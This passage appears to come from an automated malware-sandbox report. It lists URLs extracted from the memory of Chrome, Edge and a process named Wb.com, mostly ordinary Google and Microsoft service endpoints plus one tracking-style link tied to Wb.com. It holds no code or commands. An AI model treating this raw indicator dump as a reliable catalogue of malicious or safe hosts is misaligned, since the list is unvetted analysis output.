                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.dr, HubApps Icons.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.dr, HubApps Icons.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.dr, HubApps Icons.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.dr, HubApps Icons.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.dr, HubApps Icons.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                Source: chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/$l
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Aj
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Bh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Ih
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Lh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Sh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Uj
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Vh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/be
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/dj
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/jh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/nj
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/qh
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/th
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/vj
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/~h
                Source: chrome.exe, 00000011.00000003.2591689644.000047E4014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2636736368.000035080079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2591630845.000047E4014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 00000011.00000002.2636736368.000035080079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2590411022.000047E401A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2590362466.000047E401A44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2590386370.000047E401A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                Source: msedge.exe, 00000014.00000002.2777235184.00005B8002594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                Source: chrome.exe, 00000011.00000002.2640056642.000047E400630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: Wb.com, 0000000C.00000002.3032362524.00000000047F7000.00000004.00000800.00020000.00000000.sdmp, 7GLXT0.12.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640746569.000047E4007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640901512.000047E40080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                Source: chrome.exe, 00000011.00000002.2642382450.000047E400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640746569.000047E4007CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640901512.000047E40080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                Source: chrome.exe, 00000011.00000003.2589876235.000047E401994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 00000011.00000003.2589876235.000047E401994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 00000011.00000002.2635064736.0000350800238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard5
                Source: chrome.exe, 00000011.00000003.2589876235.000047E401994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardG
                Source: chrome.exe, 00000011.00000003.2549603123.00003508003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                Source: chrome.exe, 00000011.00000002.2636650790.0000350800780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
                Source: chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 00000011.00000002.2639050533.000047E400468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 00000011.00000003.2563818278.000047E4010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2564082691.000047E40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 00000011.00000003.2550358346.00003508006FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563702916.000047E4003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2563598629.000047E400E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                Source: chrome.exe, 00000011.00000003.2549395040.00003508003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 00000011.00000002.2636736368.000035080079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
                Source: chrome.exe, 00000011.00000002.2636736368.000035080079C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
                Source: chrome.exe, 00000011.00000002.2636623453.0000350800754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: chrome.exe, 00000011.00000002.2637542005.000047E4000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensgoogle.com/v3/upload
                Source: chrome.exe, 00000011.00000003.2552340537.000047E4001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                Source: chrome.exe, 00000011.00000002.2639050533.000047E400468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638868900.000047E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                Source: msedge.exe, 00000014.00000002.2777235184.00005B8002594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                Source: msedge.exe, 00000014.00000002.2777235184.00005B8002594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                Source: chrome.exe, 00000011.00000002.2639529411.000047E40050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640660218.000047E40078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                Source: chrome.exe, 00000011.00000002.2644178608.000047E400F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640691773.000047E4007A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639276736.000047E4004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                Source: chrome.exe, 00000011.00000002.2644178608.000047E400F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyG
                Source: chrome.exe, 00000011.00000002.2643588930.000047E400E44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639276736.000047E4004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                Source: chrome.exe, 00000011.00000003.2589240103.000047E40140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: chrome.exe, 00000011.00000002.2643588930.000047E400E44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639276736.000047E4004C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                Source: chrome.exe, 00000011.00000003.2561579862.000047E400E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641447831.000047E400994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2641806972.000047E400A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                Source: 2cc80dabc69f58b6_0.22.dr, 000003.log3.22.drString found in binary or memory: https://ntp.msn.com
                Source: 2cc80dabc69f58b6_0.22.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                Source: chrome.exe, 00000011.00000002.2638276092.000047E4001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                Source: chrome.exe, 00000011.00000002.2638343850.000047E40020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                Source: msedge.exe, 00000014.00000002.2777235184.00005B8002594000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                Source: chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 00000011.00000002.2637677215.000047E4000FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.goog
                Source: chrome.exe, 00000011.00000002.2642024422.000047E400B0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2644373735.000047E4010B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 00000011.00000003.2602920427.000047E401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599000760.000047E401BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602951552.000047E401D04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: chrome.exe, 00000011.00000002.2643588930.000047E400E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                Source: chrome.exe, 00000011.00000002.2643937529.000047E400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2642409748.000047E400C1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 00000011.00000002.2639357214.000047E4004E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559388809.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2643588930.000047E400E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                Source: chrome.exe, 00000011.00000003.2559388809.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2643637698.000047E400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2643588930.000047E400E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                Source: chrome.exe, 00000011.00000002.2637172275.000047E400044000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                Source: chrome.exe, 00000011.00000003.2559388809.000047E400A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2643637698.000047E400E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2643588930.000047E400E4B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2638622459.000047E4002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
